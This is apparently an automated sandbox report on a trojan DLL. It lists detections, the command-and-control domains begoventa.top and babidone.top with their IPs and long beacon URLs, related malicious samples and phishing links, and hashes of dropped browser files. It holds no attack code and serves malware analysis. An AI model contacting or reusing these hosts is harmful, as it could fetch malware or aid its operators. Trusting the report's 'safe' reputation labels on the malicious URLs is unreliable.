1.2.loaddll32.exe.cc0000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
1.2.loaddll32.exe.10000000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File

Domains

Source	Detection	Scanner	Label	Link
begoventa.top	2%	Virustotal		Browse
babidone.top	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQdxqfB9	0%	Avira URL Cloud	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://begoventa.top/favicon.ico	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQd	0%	Avira URL Cloud	safe
http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQdxqfB9mxw/6WnzZpVL425M/CKmLBjBrvSn/f81OVwTXuZJrQZ/ja96eHVtqviz347i3JPx7/5Q6Nnj7RuUGPOFSU/4_2BMMGnBKrRLtO/P_2FyE_2BfezXukLEe/1gUCCjKEM/NO_2BQ8BNJkX/Zge.avi	0%	Avira URL Cloud	safe
http://babidone.top/images/tA_2BVY2gpEVQoau7_/2F_2Fif0j/qHSdUWFKPJWkX50svEcy/JM_2Bha3oNIg2DGHFKu/s3R	0%	Avira URL Cloud	safe
https://babidone.top/images/SD1b2IxKgGl/yu82lOMR21XtBT/D978a7t2zaVGKWj8Jhn4X/WcqZuBMBlmeeUEpv/9Sv89p	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
begoventa.top	47.91.89.242	true	false	2%, Virustotal, Browse	unknown
babidone.top	193.56.255.166	true	false	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://begoventa.top/favicon.ico	false	Avira URL Cloud: safe	unknown
http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQdxqfB9mxw/6WnzZpVL425M/CKmLBjBrvSn/f81OVwTXuZJrQZ/ja96eHVtqviz347i3JPx7/5Q6Nnj7RuUGPOFSU/4_2BMMGnBKrRLtO/P_2FyE_2BfezXukLEe/1gUCCjKEM/NO_2BQ8BNJkX/Zge.avi	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	zQ32b1FVcL.dll	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.nytimes.com/	msapplication.xml3.16.dr	false		high
http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQdxqfB9	{B10F0CC6-5544-11EB-90E4-ECF4BB862DED}.dat.34.dr	false	Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0	zQ32b1FVcL.dll	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	zQ32b1FVcL.dll	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.youtube.com/	msapplication.xml7.16.dr	false		high
https://sectigo.com/CPS0D	zQ32b1FVcL.dll	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.wikipedia.com/	msapplication.xml6.16.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.amazon.com/	msapplication.xml.16.dr	false		high
http://www.live.com/	msapplication.xml2.16.dr	false		high
http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQd	loaddll32.exe, 00000001.00000002.590862827.0000000001260000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://babidone.top/images/tA_2BVY2gpEVQoau7_/2F_2Fif0j/qHSdUWFKPJWkX50svEcy/JM_2Bha3oNIg2DGHFKu/s3R	{8CB598BC-5544-11EB-90E4-ECF4BB862DED}.dat.24.dr	false	Avira URL Cloud: safe	unknown
http://www.reddit.com/	msapplication.xml4.16.dr	false		high
http://www.twitter.com/	msapplication.xml5.16.dr	false		high
https://babidone.top/images/SD1b2IxKgGl/yu82lOMR21XtBT/D978a7t2zaVGKWj8Jhn4X/WcqZuBMBlmeeUEpv/9Sv89p	loaddll32.exe, 00000001.00000002.589354244.000000000050B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.56.255.166	unknown	Romania		213137	INFOCLOUD-SRLMD	false
47.91.89.242	unknown	United States		45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	338663
Start date:	12.01.2021
Start time:	18:08:32
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	zQ32b1FVcL.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal64.troj.winDLL@13/44@4/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 44.9% (good quality ratio 43.6%) Quality average: 81.3% Quality standard deviation: 26.6%
HCA Information:	Successful, ratio: 81% Number of executed functions: 42 Number of non-executed functions: 37
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe Excluded IPs from analysis (whitelisted): 104.42.151.234, 168.61.161.212, 40.88.32.150, 104.79.90.110, 51.104.139.180, 92.122.213.247, 92.122.213.194, 88.221.62.148, 67.27.157.254, 8.248.139.254, 67.26.139.254, 8.248.115.254, 8.248.131.254, 20.54.26.129, 152.199.19.161, 52.155.217.156 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, go.microsoft.com, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, ie9comview.vo.msecnd.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, updates.microsoft.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus16.cloudapp.net, cs9.wpc.v0cdn.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
193.56.255.166	OgQJzDbLce.dll	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
begoventa.top	OgQJzDbLce.dll	Get hash	malicious	Browse	92.38.132.181
babidone.top	OgQJzDbLce.dll	Get hash	malicious	Browse	193.56.255.166

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	https://bit.ly/35cYpiT	Get hash	malicious	Browse	47.91.86.26
	https://ozmmdmfly0ob6rsgyfcjja-on.drv.tw/GAlAFw&flowName=GlifWebSignIn&flowEntry=AddSession&response_mode=form_post&response_type=code+id_token&scope=openid+profile&state=OpenIdConnect.AuthenticationProperties=7I5fOQe2aVADfQrM2gnSPpnNXdJDFVEswOkTEzvRpizt0MxezF-fEHwkij9KPoULqpUnkx2n_0Dud0uKVG57peviUxksCdnZyX7ab0n1hx9UpfkPdjMq2wNzHOC_K3ig&nonce=636810071538546755.OTdjZTIwMDItYjU4Yy00ODAxLTkzMDgtMzAzNGIwNThmY2ZkZWI3OTkzNDUtN2NlZC00MDIxLWFlZDQtNzhkNmM0ODhmMzAz&/	Get hash	malicious	Browse	47.89.250.243
	info.doc	Get hash	malicious	Browse	149.129.52.21
	https://bit.ly/3ba3hZS	Get hash	malicious	Browse	47.91.86.26
	https://bit.ly/3aA3uVV	Get hash	malicious	Browse	8.208.92.142
	SHIPPING INVOICEpdf.exe	Get hash	malicious	Browse	47.88.84.51
	factura_e_2903.vbs	Get hash	malicious	Browse	47.254.94.1
	http://chacagrabsterston.top	Get hash	malicious	Browse	8.209.77.50
	SecuriteInfo.com.Trojan.GenericKD.35624799.30696.exe	Get hash	malicious	Browse	47.57.139.0
	sULC8E4jwy.exe	Get hash	malicious	Browse	47.91.78.102
	https://bit.ly/3mH4Noj	Get hash	malicious	Browse	8.208.92.142
	https://bitly.com/2KZhv4G	Get hash	malicious	Browse	47.254.18.11
	https://bit.ly/2L1Yyyv	Get hash	malicious	Browse	8.208.92.142
	Fe8noCCZ5Z.exe	Get hash	malicious	Browse	47.91.95.232
	DualSpace.apk	Get hash	malicious	Browse	47.74.171.2
	http://p5fcw.info/HI12cu33F5	Get hash	malicious	Browse	47.242.44.124
	https://bit.ly/3pjmqfw	Get hash	malicious	Browse	8.208.92.142
	https://bit.ly/3mH4A4v	Get hash	malicious	Browse	8.208.92.142
	Order.doc	Get hash	malicious	Browse	47.74.93.57
	https://bit.ly/34CiZca	Get hash	malicious	Browse	8.208.92.142
INFOCLOUD-SRLMD	OgQJzDbLce.dll	Get hash	malicious	Browse	193.56.255.166
INFOCLOUD-SRLMD	5fd9d7ec9e7aetar.dll	Get hash	malicious	Browse	193.56.255.167

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{72A6A8A2-5544-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.769384176506226
Encrypted:	false
SSDEEP:	48:IwnhGcprZ6GwpLfTG/ap8scrGIpcMGAGvnZpvMiGo3qp9MVGo4FpmMcMGWBXHGWB:rXZYZ72B9WMotM5fM+FMMybb+B
MD5:	3AE94EF99BB24395A544FEB78372A9B4
SHA1:	B9BF9F3EAA85022159E875171B7CBA7D78ABF7EA
SHA-256:	8D41CC000A6E5405F58CA7D9AE44A4553BE4ADE7FCDDDE419D1D6A64799D9615
SHA-512:	1FEB0E03DE945D281B980F502049B36D3113FE734395C312381402A3AB8386A4F8D1254F53627FC3D8D754F1161A5697FCE399E70A2CB309FA0E478F69DB8F4A
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8CB598BA-5544-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.7710312124199559
Encrypted:	false
SSDEEP:	48:IwlGcpr4GwpL2G/ap8RrGIpc5KGvnZpv5LGoVqp95TGo4Rpm5YGWfVpGW1T6p7GT:r7ZgZ02R9W53t54f5ERM5t163B
MD5:	29C4A3C89669918F62E835D432287FE6
SHA1:	8B7FDC121BBC6CB80E84CD628C5ABF77E78982A1
SHA-256:	9BD4CA23B69DEFECB872EB2112597A065EA4F4798349956856038B0FCA4CCF63
SHA-512:	7E9004133BC8A973CF8181DA45B8A65DF075F7A3162E31734F9D19DBF46BEC3C6178651AFFCD504C1B182E0C2BE3CF722AABADD8B585F2BD7031087A8DE7D8FE
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{A2FA2B65-5544-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.7731704980611467
Encrypted:	false
SSDEEP:	48:IwpGcprThGwpLnIG/ap8ePrGIpcOxbGvnZpvOkNGotqp9OkVkGo4xpmOtcV0GW3e:rvZT7ZnC2eP9WOx8tOPfO6xMOIxLLB
MD5:	D0B87D1E0FB5C60B37D1EDDA7658A862
SHA1:	5B703AF3293216040C41C3030FFB66F9E0A45CD8
SHA-256:	7BC698F5CAAE1F21A6174F2B086160F073395E64E35407988957DDD8C64D48EE
SHA-512:	84FF9B9BA65749275AFA841992FC6A014737E511E5095E3F2D5B872AC6033683255D5DB29DA33D8ABA5701DEA0F48761F054A1406EFC6A2AA7E8F70044799FB5
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{B10F0CC4-5544-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.7729096824956627
Encrypted:	false
SSDEEP:	48:Iw6GcprLGwpLaG/ap8FrGIpcmiGvnZpvmiGoYqp9mhGo4Bpmmw6aGWm2QGWUT6p0:r+ZFZA2F9WmPtmGfmSBMmtNMZzB
MD5:	29A3292D1A3B0638CB589518AC067AC9
SHA1:	EC81BACBCA78F545996995D9B2A02487A87EF087
SHA-256:	FBC81954483148ACF4ABFE5D92FF0A8324D00FEEBB2146C93BC71FF7A706AF08
SHA-512:	EBB9748BD2C8D9C9998C90EB2FB68F8175B69F04B55FC3A99E23B1CEF513EB89746A70E29EB195817465E1456217E199AA562742780F02810E76B5212E2DF183
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{72A6A8A4-5544-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27368
Entropy (8bit):	1.8431154863360353
Encrypted:	false
SSDEEP:	192:ryZxQP61kWFjV2YkWEMbYiFWNnxFWNS2iA:ruGC+WhMcxbHFWNxFWNS2V
MD5:	98EF5675ACFCE587633A4CA29F8A53B6
SHA1:	441CB4E3A543165E2C14C8D9569A967BBCFB7C1D
SHA-256:	13FBB6DC3F8B2C0A58E8D5AEE76011B9C061BF3BF6420F1F141C0DB98FDB71B3
SHA-512:	9D6A2FBDD2B0F407FD84C39B80B6FDCAFD22ABF3E02AA0342F8C11B10BE2DAF3A322F9699446931F67CC69F2D4B11016FA9D2B41348A392273534E186C1C466C
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8CB598BC-5544-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27376
Entropy (8bit):	1.846090409968756
Encrypted:	false
SSDEEP:	48:IwfGcpryGwpaPG4pQ3GrapbSHrGQpBiGHHpcosTGUp8xGzYpm0xYGopo6LEVlMqm:r1Z6QB6LBSHFj52okW/MKY6pU3xpUu6A
MD5:	CA15393407EF61E6646343D4CF05980A
SHA1:	52729C1EFEACC636AB3151D2D5C3B6D42806A5BC
SHA-256:	014541CE1CE269C81F7F18CEA7922EDB3BD5FADA19BB0CADAC6F264B832218F1
SHA-512:	4FCA49FCC672C076083A441AC7069B8FC770FC75F1391872E987DB025DE8845135A1A7B208E4521EA4DAEFAF872DC6559FD5111BD32C83D1A1644261845DE020
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A2FA2B67-5544-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27864
Entropy (8bit):	1.8245195311791338
Encrypted:	false
SSDEEP:	48:Iw3GcprSGwpaGG4pQSGrapbSjrGQpBCGHHpcgsTGUp8oGzYpmiuYGopQEltrzDGd:r9ZaQ26UBSjFjZ2gkWsMfYS+gR+Mr
MD5:	A1413466758220F73DEED46E91F9756A
SHA1:	5E19A3B8C6362C66E4CD56EB186F05C7A71CB3B8
SHA-256:	50A092C1980431F511B130979317818920BA9FA67691B7DC0A8823892F6B3119
SHA-512:	8464507EBCD7A671C7BAC35990202422BBA3EAC2B415B1F802961DFDABBC1D3BBB7593A559FBBC3B55C74F6C84D7C64DFE60F7C331E86F673C044BEAFE7725E9
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B10F0CC6-5544-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27360
Entropy (8bit):	1.8405411493608728
Encrypted:	false
SSDEEP:	96:rrZQQ86KBSxFjxn2KkWCMIcYqEOYSREOYdzKA:rrZQQ86KkxFjxn2KkWCMIcYqEiRENzKA
MD5:	24F2A9DDEC3F9966E5B4E0D0553D0C9C
SHA1:	C12245E6657FDC26BE62E45312629459BE08BA14
SHA-256:	5A5D80B9ACB62503C5B17BD0EE1D164089DB55C31C652BC861FF6458495C21EE
SHA-512:	5217E67AF8E070387390C163758B17496825269001DDCA78B6C437A62F414B8205AEF08B3D8C054F07CCE51701BDD04E846B579A7D69B935C736F96AC760EBA4
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.100241569421958
Encrypted:	false
SSDEEP:	12:TMHdNMNxOEwW2UW2vnWimI002EtM3MHdNMNxOEwW2UW2vnWimI00ObVbkEtMb:2d6NxOMqcSZHKd6NxOMqcSZ76b
MD5:	2C436588E3D6DCF7FE89112328B3E730
SHA1:	4164F8038964A5A9384EF22402A93EDEE75EB21C
SHA-256:	08D1B15B701CD6919F93D0E26C9B501DF224789204A85F1CD22B65F72DBFDA8D
SHA-512:	B6F212B2B49C1F59232B5523440C5B3F1F73301188BD4D8CA6C758392A313018F77F595F7A3BBEE908ACC83A4A8D80AB5836930083469D8D96C730C6B0747824
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x48330f3c,0x01d6e951</date><accdate>0x48330f3c,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x48330f3c,0x01d6e951</date><accdate>0x48330f3c,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.173699561853213
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2kwc0cPnWimI002EtM3MHdNMNxe2kwc0a4nWimI00Obkak6EtMb:2d6Nxr2SZHKd6Nxro4SZ7Aa7b
MD5:	18108C1538C400F573ED71BF12A57228
SHA1:	D3AD68F727F86A97FF01D69CD0CD824999B74D32
SHA-256:	DF85CE99B84855741812B93F31942C9766FED19D528FC98BE950AA91997D8F45
SHA-512:	0B350664E7C4472F54F452A290F005ED1302A9CE7D3DD226553A2342EA83D770F2A39DFFE95827C6D8448770A27992E3042F97452EE8CE1976FF18CC57B9CB8D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x48298613,0x01d6e951</date><accdate>0x48298613,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x48298613,0x01d6e951</date><accdate>0x482be878,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	662
Entropy (8bit):	5.135413702811249
Encrypted:	false
SSDEEP:	12:TMHdNMNxvLwWYZWYanWimI002EtM3MHdNMNxvLwWYZWYanWimI00ObmZEtMb:2d6Nxv3f/SZHKd6Nxv3f/SZ7mb
MD5:	647C1BD469F8A2E152BB8CDE9294BDA2
SHA1:	7CDC043A343B5654844743DE41430C34770684A8
SHA-256:	D77AEFB653210521D7EED77736BBCC9DD39B79D3C8B01C3864295CA529701696
SHA-512:	82345CF268E17184320BFDE399FAFB4D3FEAD5B141FCAB2E8E45C458D7915199CDDEB19EF25F414C908221F7B76CDB4F0221C60C5CB05D418B7F0E9C4C9C2C91
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x483571cf,0x01d6e951</date><accdate>0x483571cf,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x483571cf,0x01d6e951</date><accdate>0x483571cf,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	647
Entropy (8bit):	5.112516029119953
Encrypted:	false
SSDEEP:	12:TMHdNMNxiwWubmWubpnWimI002EtM3MHdNMNxiwWubmWubpnWimI00Obd5EtMb:2d6NxSuISZHKd6NxSuISZ7Jjb
MD5:	CE75127F3FE5FF1F42A6465CB5948887
SHA1:	B750B0E975B083CE241678BC85ABE0C1AFBF057E
SHA-256:	C9A450FD56CB3D9039BF84EF161F5D8BD91307396AA7C530666AF811145847C1
SHA-512:	013AEF41A65E85B923BF9D1CCF8BF373191E1DA9F527B346FAC0A6DB97DB37127E13DB3314621CD4B0610582B03CD9372CB7492A93B16C6E18F780DF8B6BDA5E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x4830ad7a,0x01d6e951</date><accdate>0x4830ad7a,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x4830ad7a,0x01d6e951</date><accdate>0x4830ad7a,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.154826181095927
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGwwWYZWYanWimI002EtM3MHdNMNxhGwwWYZWyNanWimI00Ob8K075Es:2d6NxQof/SZHKd6NxQofyNaSZ7YKajb
MD5:	9C0ED05861F4BEABF0296BCF3CB7A3FC
SHA1:	AB9D6DCB20A34A858CBB692AFFE2B2DF14576B80
SHA-256:	EFCFC15BFFB9677764C6DB26CC1E63341E8C816BEA1C8AD394CCFC21566AE0AC
SHA-512:	AA587BC104BCC412DA3E042243F4FBF8044B0E41821C19491BE48AEAF9132C271E7FC4584677AD3C6807DFC7E63C4993668E191884A551A5D2D5683B6D486489
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x483571cf,0x01d6e951</date><accdate>0x483571cf,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x483571cf,0x01d6e951</date><accdate>0x4837d4a4,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.103439486630095
Encrypted:	false
SSDEEP:	12:TMHdNMNx0nwW2UW2vnWimI002EtM3MHdNMNx0nwW2UW2vnWimI00ObxEtMb:2d6Nx0jqcSZHKd6Nx0jqcSZ7nb
MD5:	ADA9C3D86BF31E7FFB632FBD5C1472EA
SHA1:	2F2649ADCE55986DFE8BB4214AFB2877C6D6E87D
SHA-256:	6CC12B67772FA86AE2203F8D133A7461C812F249ED494BF88AB9DA63F880648B
